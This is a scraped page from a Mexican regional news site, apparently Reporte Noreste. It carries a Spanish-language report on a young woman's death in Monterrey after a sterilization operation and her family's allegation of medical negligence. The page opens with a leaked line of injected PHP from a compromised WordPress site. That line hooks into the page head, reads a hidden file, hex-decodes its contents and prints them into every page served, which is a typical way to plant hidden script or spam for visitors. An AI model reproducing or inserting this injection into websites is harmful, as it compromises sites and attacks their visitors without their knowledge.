if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Denuncian presunta negligencia médica tras muerte de joven en Monterrey – Reporte Noreste
Conéctate con nosotros

Noreste

Denuncian presunta negligencia médica tras muerte de joven en Monterrey

Denuncian presunta negligencia médica tras muerte de joven en Monterrey

Familiares y amigos de una joven que falleció después de operarse para no tener más hijos denunciaron una posible negligencia y exigen a las autoridades que se esclarezca su muerte.

Familiares de la joven Erika Zamora reportan que el pasado 7 de septiembre la joven habría dado a luz a su cuarta hija en el hospital universitario de Monterrey en donde le realizaron una operación para ya no tener más hijos.

Señalan que la joven murió a causa de dicha operación en donde le habrían perforado el intestino grueso sintiéndose mal a los 2 días de haber sido atendida no queriendo consumir alimentos vomitando y haciendo sus necesidades básicas en la cama.

Señala que fue a consultar otra vez en el hospital universitario y los elementos de seguridad del lugar le dijeron que ya no tenía nada comenzando enfermar de gravedad y muriendo este fin de semana.

Antes de fallecer fue atendido en la clínica 17 de donde le detectaron que el intestino grueso se lo habían perforado en la operación dañándole parte de su riñón pulmón causando también un daño en su cabeza.

Familiares amigos y esposo de la fallecida exigen a las autoridades una respuesta y que se investigue el caso.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Noreste